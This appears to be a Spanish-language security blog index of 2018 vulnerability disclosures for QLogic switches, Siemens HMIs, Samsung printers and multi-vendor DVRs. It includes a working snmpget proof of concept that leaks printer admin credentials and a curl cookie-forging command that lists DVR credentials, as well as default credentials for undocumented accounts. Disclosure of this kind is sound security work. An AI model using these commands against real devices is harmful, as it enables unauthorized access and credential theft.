martes, 9 de octubre de 2018

[Qlogic] 4G & 4/8G Fibre Channel Switch Module for IBM BladeCenter (CVE-2018-18202 )

Users (prom, diags and support) are not documented in the Qlogic 4/8G documentation, and those users  have the same login name as password


Affected System:  

  • QLogic(R) 4Gb Fibre Channel Switch Module for IBM BladeCenter(R)
  • QLogic(R) 20-Port 4/8 Gb SAN Switch Module for IBM BladeCenter(R)

jueves, 4 de octubre de 2018

[Siemens] SIMATIC HMI; "HTTP Header Injection" via CRLF

 "HTTP Header Injection", via CRLF (Salto de linea y retorno de carro ) en equipos "SIMANTIC HMI" de la firma Siemens.

miércoles, 3 de octubre de 2018

#Samsung #printer #passwordLeak ( CVE-2018-17969 )


Problemas con el acceso ?



No problema!
Passwords leaks, via SNMP !

Poc 


USUARIO:
$ snmpget -v 1 -c public 192.168.0.22 iso.3.6.1.4.1.236.11.5.11.81.10.1.5.0
> iso.3.6.1.4.1.236.11.5.11.81.10.1.5.0 = STRING: "admin"

PASSWORD:
$ snmpget -v 1 -c public 192.168.0.22 iso.3.6.1.4.1.236.11.5.11.81.10.1.6.0
> iso.3.6.1.4.1.236.11.5.11.81.10.1.6.0 = STRING: "1111"




Challenge success !!!





Saludos,
@capitan_alfa

miércoles, 2 de mayo de 2018

[ 0day ] DVR (#multi)vendor ( CVE-2018-10676 )

Ya estamos al tanto del anterior fallo que atentanta contra miles de DVR, al que le fue asignado el CVE: "CVE-2018-9995".


Fallo involucra a dispositivos de distintos vendors ( TBK Vision, Novo, CeNova, QSee, Pulnix, Securus, Night OWL, etc. )

lunes, 30 de abril de 2018

[update] DVR Login Bypass ( CVE-2018-9995 )

En un articulo anterior presente una vuln que me permitía obtener las credenciales de cierto modelo de DVR.

Tan simple como:


$> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
Resulta que el hallazgo no corresponde a un vendor en particular como originalmente supuse.


domingo, 29 de abril de 2018

#Strinbleed, SNMP Protocol "God Mode".

Hoy me levante recordando a #strinbleed, el primer interesante hallazgo que sacamos con el amigo Jose (@bertinjoseb). Esto fue a principios de Abril y recien el marzo/2017 había escrito algo respecto. En ese momento hacia referencia a unos "curiosos" Comunity strings. 

Un tiempo despues salio el CVE-2017-5135 y al hallazgo lo bautizamos como Stringbleed.